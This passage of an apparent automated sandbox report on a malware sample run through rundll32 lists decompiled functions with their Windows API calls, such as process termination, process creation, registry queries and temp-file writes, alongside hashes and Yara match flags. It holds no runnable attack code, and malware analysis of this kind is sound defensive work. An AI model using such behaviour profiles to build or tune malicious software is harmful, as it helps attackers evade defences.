                                • Instruction ID: 8f3279f904f5c3c15fe4bdf976e017a98efa4abfb3f873fb0cbae1812cb46281
                                • Opcode Fuzzy Hash: b03ac100d8c7f2cd823bd796182fcc1658f827da652acb1f96592c1f7ce9bf30
                                • Instruction Fuzzy Hash: BF316B32900218FFDF21EF65DC848AF7BEAFB49280B158427FA04AF210D3719D559B94
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0347A976 Relevance: 9.1, APIs: 6, Instructions: 91timememoryCOMMON
                                Download Yara Rule
                                APIs
                                • OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 0347A990
                                • CreateWaitableTimerA.KERNEL32(0349A1E8,00000001,?), ref: 0347A9AD
                                • GetLastError.KERNEL32(?,00000000,03488C06,00000000,00000000,0000801C,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 0347A9BE
                                  • Part of subcall function 03491ECA: RegQueryValueExA.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,03472C89,?), ref: 03491F02
                                  • Part of subcall function 03491ECA: RtlAllocateHeap.NTDLL(00000000,?), ref: 03491F16
                                  • Part of subcall function 03491ECA: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,03472C89,?), ref: 03491F30
                                  • Part of subcall function 03491ECA: RegCloseKey.KERNEL32(?,?,00000000,?,?,00000000,?,?,?,03472C89,?,?,?), ref: 03491F5A
                                • GetSystemTimeAsFileTime.KERNEL32(00000000,00000000,00000000,?,?,00000000,03488C06,00000000,00000000,0000801C), ref: 0347A9FE
                                • SetWaitableTimer.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,03488C06,00000000,00000000,0000801C), ref: 0347AA1D
                                • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,03488C06,00000000,00000000,0000801C), ref: 0347AA33
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: TimerWaitable$HeapQueryTimeValue$AllocateCloseCreateErrorFileFreeLastOpenSystem
                                • String ID:
                                • API String ID: 1835239314-0
                                • Opcode ID: fe7fc1e34af700208776be236f803af2893cea282bc25b2ea011d0a3661ce253
                                • Instruction ID: e3e4ed66a8323452e0da55a24bc4ef3e6760ddc47f440479813ed1e68dbab98d
                                • Opcode Fuzzy Hash: fe7fc1e34af700208776be236f803af2893cea282bc25b2ea011d0a3661ce253
                                • Instruction Fuzzy Hash: 50311C71D00248EFCF21EF95CA89CEFBBB9EB99351B288457F505AA300D3305A44CB65
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0347F519 Relevance: 9.1, APIs: 6, Instructions: 78memoryCOMMON
                                Download Yara Rule
                                APIs
                                • StrChrA.SHLWAPI(?,00000020,00000000,?,00000000,?,?,?,03487C35,00000000,?,?,?), ref: 0347F531
                                • StrChrA.SHLWAPI(00000001,00000020,?,?,?,03487C35,00000000,?,?,?), ref: 0347F542
                                  • Part of subcall function 03471F0F: lstrlen.KERNEL32(?,?,00000000,00000000,?,03483D4E,00000000,?,?,00000000,00000001), ref: 03471F21
                                  • Part of subcall function 03471F0F: StrChrA.SHLWAPI(?,0000000D,?,03483D4E,00000000,?,?,00000000,00000001), ref: 03471F59
                                • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 0347F582
                                • memcpy.NTDLL(00000000,?,00000007,?,?,?,03487C35,00000000), ref: 0347F5AF
                                • memcpy.NTDLL(00000000,?,?,00000000,?,00000007,?,?,?,03487C35,00000000), ref: 0347F5BE
                                • memcpy.NTDLL(?,?,?,00000000,?,?,00000000,?,00000007,?,?,?,03487C35,00000000), ref: 0347F5D0
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: memcpy$AllocateHeaplstrlen
                                • String ID:
                                • API String ID: 1819133394-0
                                • Opcode ID: e9837550c2a99f9859efeac58e9da11b33562e2077b37bce4b6b75ee9945aa45
                                • Instruction ID: 7e6a69208f907c9cb845ac5914e0147d4f80f2222b12e8b34aad4b78227381f1
                                • Opcode Fuzzy Hash: e9837550c2a99f9859efeac58e9da11b33562e2077b37bce4b6b75ee9945aa45
                                • Instruction Fuzzy Hash: F6219072500209BFDB11DF99DC85F9ABBECEF08284F054153F904EF252DA70E9458BA4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0349049A Relevance: 9.1, APIs: 6, Instructions: 74memoryCOMMON
                                Download Yara Rule
                                APIs
                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,00000001,00000000,00000000,00000000,00000000,?,?,?,?,00000000,00000000), ref: 034904D9
                                • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 034904EA
                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,00000001,00000000,?,00000000,00000000), ref: 03490505
                                • GetLastError.KERNEL32 ref: 0349051B
                                • HeapFree.KERNEL32(00000000,?), ref: 0349052D
                                • HeapFree.KERNEL32(00000000,?), ref: 03490542
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$ByteCharFreeMultiWide$AllocateErrorLast
                                • String ID:
                                • API String ID: 1822509305-0
                                • Opcode ID: 96ce6c6c775ee1fb2d34c6101fe6283168238b18a5705f8cc7766397a55c34f8
                                • Instruction ID: 13b76045a5926682319df554b94e51a8e4f2919b1f3cd5cbd4b261c056ce43b2
                                • Opcode Fuzzy Hash: 96ce6c6c775ee1fb2d34c6101fe6283168238b18a5705f8cc7766397a55c34f8
                                • Instruction Fuzzy Hash: 09115EB6901028BBDF22AF96DC09CEF7FBEEF562A0B110053F505E9114D6314A55EBA4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0348C8EF Relevance: 9.1, APIs: 6, Instructions: 67stringCOMMON
                                Download Yara Rule
                                APIs
                                • OpenProcess.KERNEL32(00000E39,00000000,?), ref: 0348C917
                                • _strupr.NTDLL ref: 0348C952
                                • lstrlen.KERNEL32(00000000), ref: 0348C95A
                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 0348C999
                                • CloseHandle.KERNEL32(00000000,00000000,00000000,?,00000104), ref: 0348C9A0
                                • GetLastError.KERNEL32 ref: 0348C9A8
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$CloseErrorHandleLastOpenTerminate_struprlstrlen
                                • String ID:
                                • API String ID: 110452925-0
                                • Opcode ID: b5a92bf4df19419567e21e61f868cb4239fdb55554e7c31e99d6fcf3c5d226f4
                                • Instruction ID: 0cf6f7b458e0f264ab0c836b8ebb879baa4150ef77e36af1808e37e2323bcd14
                                • Opcode Fuzzy Hash: b5a92bf4df19419567e21e61f868cb4239fdb55554e7c31e99d6fcf3c5d226f4
                                • Instruction Fuzzy Hash: 3411C172500204EFDB12BB759C88DAFB7ECAB99650B240497F906EE148DA308C868F74
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0348B549 Relevance: 9.1, APIs: 6, Instructions: 66registrymemoryCOMMON
                                Download Yara Rule
                                APIs
                                • RegOpenKeyA.ADVAPI32(80000001,?,76CDF710), ref: 0348B567
                                • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0348B595
                                • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 0348B5A7
                                • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0348B5CC
                                • HeapFree.KERNEL32(00000000,00000000), ref: 0348B5E7
                                • RegCloseKey.ADVAPI32(?), ref: 0348B5F1
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: HeapQueryValue$AllocateCloseFreeOpen
                                • String ID:
                                • API String ID: 170146033-0
                                • Opcode ID: 7cc064c5a9c2c5a4e75a332e067c230241a74cacb5b5e36c5bc47ac470a6ef6c
                                • Instruction ID: 74302fd5da71316b31977f81ee7c5888298d761f3a735ba4586be43b9debb17a
                                • Opcode Fuzzy Hash: 7cc064c5a9c2c5a4e75a332e067c230241a74cacb5b5e36c5bc47ac470a6ef6c
                                • Instruction Fuzzy Hash: 36111776900108FFDB11EF99DC84CEEBBFDEB49204B1440A7E901EA218E3315A15DB10
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0347A5E7 Relevance: 9.1, APIs: 6, Instructions: 65memorystringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlen.KERNEL32(00000000,76CDF730,-00000001,00000000,?,?,?,03478EF7,?,00000000,000000FF), ref: 0347A5F8
                                • lstrlen.KERNEL32(?,?,?,?,03478EF7,?,00000000,000000FF), ref: 0347A5FF
                                • RtlAllocateHeap.NTDLL(00000000,00000020), ref: 0347A611
                                • _snprintf.NTDLL ref: 0347A637
                                  • Part of subcall function 0348C01F: memset.NTDLL ref: 0348C034
                                  • Part of subcall function 0348C01F: lstrlenW.KERNEL32(00000000,00000000,00000000,773EDBB0,00000020,00000000), ref: 0348C06D
                                  • Part of subcall function 0348C01F: wcstombs.NTDLL ref: 0348C077
                                  • Part of subcall function 0348C01F: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0C000000,00000000,00000000,00000044,?,00000000,773EDBB0,00000020,00000000), ref: 0348C0A8
                                  • Part of subcall function 0348C01F: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,0347A645), ref: 0348C0D4
                                  • Part of subcall function 0348C01F: TerminateProcess.KERNEL32(?,000003E5), ref: 0348C0EA
                                  • Part of subcall function 0348C01F: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,0347A645), ref: 0348C0FE
                                  • Part of subcall function 0348C01F: CloseHandle.KERNEL32(?), ref: 0348C131
                                  • Part of subcall function 0348C01F: CloseHandle.KERNEL32(?), ref: 0348C136
                                • _snprintf.NTDLL ref: 0347A66B
                                  • Part of subcall function 0348C01F: GetLastError.KERNEL32 ref: 0348C102
                                  • Part of subcall function 0348C01F: GetExitCodeProcess.KERNEL32(?,00000001), ref: 0348C122
                                • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,?,?,00000000,000000FF), ref: 0347A688
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Processlstrlen$CloseHandleHeapMultipleObjectsWait_snprintf$AllocateCodeCreateErrorExitFreeLastTerminatememsetwcstombs
                                • String ID:
                                • API String ID: 1481739438-0
                                • Opcode ID: 570ccbc595d6ccf63b59ec1bd0e753a25d5a6c015416b2e28333683a99fdd9a3
                                • Instruction ID: 0660a35877a826f7f1f5461b80c9d84f4bb1602288402540ce2a294882a26e16
                                • Opcode Fuzzy Hash: 570ccbc595d6ccf63b59ec1bd0e753a25d5a6c015416b2e28333683a99fdd9a3
                                • Instruction Fuzzy Hash: 2411DDB2100218BFCF12AF94DC85D9E7FADEB093A0B164157FE09AF211D631DA10DBA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0348F791 Relevance: 9.1, APIs: 6, Instructions: 64memorystringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlen.KERNEL32(0347261E,00000000,00000000,00000008,00000000,?,0347261E,0347988B,00000000,?), ref: 0348F7A7
                                • RtlAllocateHeap.NTDLL(00000000,00000009,00000000), ref: 0348F7BA
                                • lstrcpy.KERNEL32(00000008,0347261E), ref: 0348F7DC
                                • GetLastError.KERNEL32(03474A0A,00000000,00000000,?,0347261E,0347988B,00000000,?), ref: 0348F805
                                • HeapFree.KERNEL32(00000000,00000000,?,0347261E,0347988B,00000000,?), ref: 0348F81D
                                • CloseHandle.KERNEL32(00000000,03474A0A,00000000,00000000,?,0347261E,0347988B,00000000,?), ref: 0348F826
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseErrorFreeHandleLastlstrcpylstrlen
                                • String ID:
                                • API String ID: 2860611006-0
                                • Opcode ID: d11b61ae3cfb3c3354da4fefffa441e384bc984237e97691067459ded7293070
                                • Instruction ID: 5cecd9c605418adfb25842c26e77aa475a03ab71fe0f4e1c8b5e6abed21d1d91
                                • Opcode Fuzzy Hash: d11b61ae3cfb3c3354da4fefffa441e384bc984237e97691067459ded7293070
                                • Instruction Fuzzy Hash: DB11B135500206EFDB01EF65D88989EBBE8FF11260715446BF826EB210D7309C59CBA4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0348508C Relevance: 9.1, APIs: 6, Instructions: 61stringthreadtimeCOMMON
                                Download Yara Rule
                                APIs
                                • GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,76C85520,?,?,?,03475112,00000000,?,00000000,00000000,?), ref: 0348509E
                                  • Part of subcall function 03479394: RtlAllocateHeap.NTDLL(00000000,?,03480051), ref: 034793A0
                                • GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,03475112,00000000,?,00000000,00000000,?), ref: 034850B7
                                • GetCurrentThreadId.KERNEL32 ref: 034850C4
                                • GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,03475112,00000000,?,00000000,00000000,?), ref: 034850D0
                                • GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,03475112,00000000,?,00000000,00000000,?), ref: 034850DE
                                • lstrcpy.KERNEL32(00000000), ref: 03485100
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Temp$FilePathTime$AllocateCurrentHeapNameSystemThreadlstrcpy
                                • String ID:
                                • API String ID: 1175089793-0
                                • Opcode ID: 8d91747adc796b8051e1ff72a32d8c56ac2ae2f0a3137bb92555d127d6d4fc62
                                • Instruction ID: 0e586d35d8356d2b5d8edb5563726d9e8072247a445d5fd9f27a83c52d7f244e
                                • Opcode Fuzzy Hash: 8d91747adc796b8051e1ff72a32d8c56ac2ae2f0a3137bb92555d127d6d4fc62
                                • Instruction Fuzzy Hash: FF016132D102157BD711BBA69C89E6F7BECEF97A40709049BB901EF205DB70D80187B4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 03474F2E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120memorystringCOMMON
                                Download Yara Rule
                                APIs
                                • RtlAllocateHeap.NTDLL(00000000,?), ref: 03474FB8
                                • lstrlen.KERNEL32(?,?), ref: 03474FE9
                                • memcpy.NTDLL(00000008,?,00000001), ref: 03474FF8
                                • HeapFree.KERNEL32(00000000,00000000,?), ref: 0347507A
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateFreelstrlenmemcpy
                                • String ID: W
                                • API String ID: 379260646-655174618
                                • Opcode ID: d3def5968631808be4f018c448a553dc7ae437772d38133a671476ce6590159b
                                • Instruction ID: bfceffb7cf1a961a523abb0b97c8d614afbaa7b9d72cded009e34dbe49cdc632
                                • Opcode Fuzzy Hash: d3def5968631808be4f018c448a553dc7ae437772d38133a671476ce6590159b
                                • Instruction Fuzzy Hash: 9741AF301002499FCB25DF6AD884BFABBEDAB16314F09846FE459CF314C7359586CB89
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0348596C Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 112COMMON
                                Download Yara Rule
                                APIs
                                • memset.NTDLL ref: 03485A17
                                • FlushFileBuffers.KERNEL32(00000000,?,00000000,00000000), ref: 03485A84
                                • GetLastError.KERNEL32(?,00000000,00000000), ref: 03485A8E
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: BuffersErrorFileFlushLastmemset
                                • String ID: K$P
                                • API String ID: 3817869962-420285281
                                • Opcode ID: bb1d2b99a5a4e2d7485574bdb6b26ad04ceff59d9a3082f759732262a31f16db
                                • Instruction ID: b5bca061744650e53bea91fe0d60c290bfc12c1aafa068f4de7ae8d16ceecf54
                                • Opcode Fuzzy Hash: bb1d2b99a5a4e2d7485574bdb6b26ad04ceff59d9a3082f759732262a31f16db
                                • Instruction Fuzzy Hash: CC418F30A007099FDB21DFA8C9C46AFBBF5FF45600F1889AED486DB680D334A944CB64
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0347D0E3 Relevance: 8.9, APIs: 7, Instructions: 108stringCOMMON
                                Download Yara Rule
                                APIs
                                • memcpy.NTDLL(?,0347DE40,00000000,?,?,?,0347DE40,?,?,?,?,?), ref: 0347D121
                                • lstrlen.KERNEL32(0347DE40,?,?,?,0347DE40,?,?,?,?,?), ref: 0347D13F
                                • memcpy.NTDLL(?,?,?,?,?,?,?), ref: 0347D1AE
                                • lstrlen.KERNEL32(0347DE40,00000000,00000000,?,?,?,0347DE40,?,?,?,?,?), ref: 0347D1CF
                                • lstrlen.KERNEL32(03F8458B,?,?,?,?,?,?,?), ref: 0347D1E3
                                • memcpy.NTDLL(?,03F8458B,00000000,?,?,?,?,?,?,?), ref: 0347D1EC
                                • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0347D1FA
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrlenmemcpy$FreeLocal
                                • String ID:
                                • API String ID: 1123625124-0
                                • Opcode ID: e3edea4b531505ea04b7e0efe86359a5ce3f8952875bae22f3ea6c4e6d156768
                                • Instruction ID: 097fc220cbede46f9a0117661401cc5c77a869c712b139e0f8acf48da3642be0
                                • Opcode Fuzzy Hash: e3edea4b531505ea04b7e0efe86359a5ce3f8952875bae22f3ea6c4e6d156768
                                • Instruction Fuzzy Hash: 9741F8B680021AAFDF11DF65DC418DB3FA8EF15260B054566FC18AB211E771DE608BE4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 03472009 Relevance: 7.7, APIs: 6, Instructions: 171stringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 03478669: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,?,?,?,03472028,?), ref: 0347867A
                                  • Part of subcall function 03478669: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,00000000,?,?,?,03472028,?), ref: 03478697
                                • lstrlenW.KERNEL32(?,00000000,?,?,?), ref: 03472055
                                • lstrlenW.KERNEL32(00000008,?,?,?), ref: 0347205C
                                • lstrlenW.KERNEL32(?,?,?,?,?), ref: 0347207A
                                • lstrlen.KERNEL32(00000000,?,00000000), ref: 03472138
                                • lstrlenW.KERNEL32(?), ref: 03472143
                                • wsprintfA.USER32 ref: 03472185
                                  • Part of subcall function 0348E803: RtlFreeHeap.NTDLL(00000000,?,03483953,?,?,0348BF5B,00000000,00000000,034710B0,00000000,03499F2C,00000008,00000003), ref: 0348E80F
                                  • Part of subcall function 0347F39B: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000,?,?,00000000,00001000), ref: 0347F3DB
                                  • Part of subcall function 0347F39B: GetLastError.KERNEL32 ref: 0347F3E5
                                  • Part of subcall function 0347F39B: WaitForSingleObject.KERNEL32(000000C8), ref: 0347F40A
                                  • Part of subcall function 0347F39B: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000), ref: 0347F42D
                                  • Part of subcall function 0347F39B: SetFilePointer.KERNEL32(00001000,00000000,00000000,00000002), ref: 0347F455
                                  • Part of subcall function 0347F39B: WriteFile.KERNEL32(00001000,00001388,?,?,00000000), ref: 0347F46A
                                  • Part of subcall function 0347F39B: SetEndOfFile.KERNEL32(00001000), ref: 0347F477
                                  • Part of subcall function 0347F39B: CloseHandle.KERNEL32(00001000), ref: 0347F48F
                                  • Part of subcall function 03479394: RtlAllocateHeap.NTDLL(00000000,?,03480051), ref: 034793A0
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Filelstrlen$CreateEnvironmentExpandHeapStrings$AllocateCloseErrorFreeHandleLastObjectPointerSingleWaitWritewsprintf
                                • String ID:
                                • API String ID: 1727939831-0
                                • Opcode ID: 3746d6b79ac71f4c7bf55bd051e957a56282ea27abfc8e502552f5c1ec9a59d7
                                • Instruction ID: f6d07579c9ff2c9815349e0d5eae44615634918cedf0f8cd62b51b8cf3a10ff9
                                • Opcode Fuzzy Hash: 3746d6b79ac71f4c7bf55bd051e957a56282ea27abfc8e502552f5c1ec9a59d7
                                • Instruction Fuzzy Hash: FC516075900209AFCF11EFAADC85DEE7BF9FF48200B04446BE914AF214DB35CA119B64
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 03477DF5 Relevance: 7.7, APIs: 6, Instructions: 163COMMON
                                Download Yara Rule
                                APIs
                                • memcpy.NTDLL(?,?,00000010,?,?,?,?,?,?,?,?,?,?,03485583,00000000,00000000), ref: 03477E46
                                • memcpy.NTDLL(00000000,00000000,?,0000011F), ref: 03477ED9
                                • GetLastError.KERNEL32(?,?,0000011F), ref: 03477F31
                                • GetLastError.KERNEL32 ref: 03477F63
                                • GetLastError.KERNEL32 ref: 03477F77
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,03485583,00000000,00000000,?,03473EC6,?), ref: 03477F8C
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLast$memcpy
                                • String ID:
                                • API String ID: 2760375183-0
                                • Opcode ID: bddc69db4bf7df9307bcd1ab664b995e7da8246c94b5ff9faee4d6d9807960e9
                                • Instruction ID: 06be1e6dba7c4cd40f3288bd3f1bc8418f9989980a1691b1d14db778fa301ef3
                                • Opcode Fuzzy Hash: bddc69db4bf7df9307bcd1ab664b995e7da8246c94b5ff9faee4d6d9807960e9
                                • Instruction Fuzzy Hash: 5D515BB1900208BFDB10DFA5DC84AEEBFB8FB08354F14442AF925EA240D7349A55CB64
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0348ADF7 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 146stringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 03479394: RtlAllocateHeap.NTDLL(00000000,?,03480051), ref: 034793A0
                                • lstrcpy.KERNEL32(?,00000020), ref: 0348AEF4
                                • lstrcat.KERNEL32(?,00000020), ref: 0348AF09
                                • lstrcmp.KERNEL32(00000000,?), ref: 0348AF20
                                • lstrlen.KERNEL32(?), ref: 0348AF44
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
                                • String ID:
                                • API String ID: 3214092121-3916222277
                                • Opcode ID: 510869af502dbd99c82aba7877bd395183d7c0d3b35e7d0e996c5738039b2dc1
                                • Instruction ID: 525d7715ce111ef36d608bca2813e20eaeb8463e12f78f8eca240f33deb256f6
                                • Opcode Fuzzy Hash: 510869af502dbd99c82aba7877bd395183d7c0d3b35e7d0e996c5738039b2dc1
                                • Instruction Fuzzy Hash: CC51A071E00208EFDF21EF99C9846AEFBB5EF55314F19845BE9159F201C7B0AA41CB94
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0347D581 Relevance: 7.6, APIs: 6, Instructions: 122stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlenW.KERNEL32(?,03493D54,06169A2B,00000057), ref: 0347D5A3
                                • lstrlenW.KERNEL32(?,03493D54,06169A2B,00000057), ref: 0347D5B4
                                • lstrlenW.KERNEL32(?,03493D54,06169A2B,00000057), ref: 0347D5C6
                                • lstrlenW.KERNEL32(?,03493D54,06169A2B,00000057), ref: 0347D5D8
                                • lstrlenW.KERNEL32(?,03493D54,06169A2B,00000057), ref: 0347D5EA
                                • lstrlenW.KERNEL32(?,03493D54,06169A2B,00000057), ref: 0347D5F6
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrlen
                                • String ID:
                                • API String ID: 1659193697-0
                                • Opcode ID: fdd0eae6ea8063588594de3d8c13f97299b5ee929081ac66f8b105390104c001
                                • Instruction ID: d545f80a697194afc93d0c30631ea8a941910b5057067648cbfdeb2cb488704b
                                • Opcode Fuzzy Hash: fdd0eae6ea8063588594de3d8c13f97299b5ee929081ac66f8b105390104c001
                                • Instruction Fuzzy Hash: E6416171E1020AAFCB60EF99C880AAFF7F9FF99244B18886ED515EB310D770D9058B54
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 03485C28 Relevance: 7.6, APIs: 5, Instructions: 102synchronizationCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 034824C3: OpenMutexA.KERNEL32(00100001,00000000,?), ref: 034824CF
                                  • Part of subcall function 034824C3: SetLastError.KERNEL32(000000B7,?,03485C3C,?,?,00000000,?,?,?), ref: 034824E0
                                • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,00000000,?,?,?), ref: 03485C5C
                                • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?), ref: 03485D34
                                  • Part of subcall function 0347A976: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 0347A990
                                  • Part of subcall function 0347A976: CreateWaitableTimerA.KERNEL32(0349A1E8,00000001,?), ref: 0347A9AD
                                  • Part of subcall function 0347A976: GetLastError.KERNEL32(?,00000000,03488C06,00000000,00000000,0000801C,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 0347A9BE
                                  • Part of subcall function 0347A976: GetSystemTimeAsFileTime.KERNEL32(00000000,00000000,00000000,?,?,00000000,03488C06,00000000,00000000,0000801C), ref: 0347A9FE
                                  • Part of subcall function 0347A976: SetWaitableTimer.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,03488C06,00000000,00000000,0000801C), ref: 0347AA1D
                                  • Part of subcall function 0347A976: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,03488C06,00000000,00000000,0000801C), ref: 0347AA33
                                • GetLastError.KERNEL32(?,?,?,00000000,?,?,?), ref: 03485D1D
                                • ReleaseMutex.KERNEL32(00000000,?,?,00000000,?,?,?), ref: 03485D26
                                  • Part of subcall function 034824C3: CreateMutexA.KERNEL32(0349A1E8,00000000,?,?,03485C3C,?,?,00000000,?,?,?), ref: 034824F3
                                • GetLastError.KERNEL32(?,?,00000000,?,?,?), ref: 03485D41
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLast$MutexTimerWaitable$CreateOpenTime$CloseFileFreeHandleHeapMultipleObjectsReleaseSystemWait
                                • String ID:
                                • API String ID: 1700416623-0
                                • Opcode ID: 0b3483380385043abb76d9528878f88053f2fcd437c85870c0410f7ad26a54b9
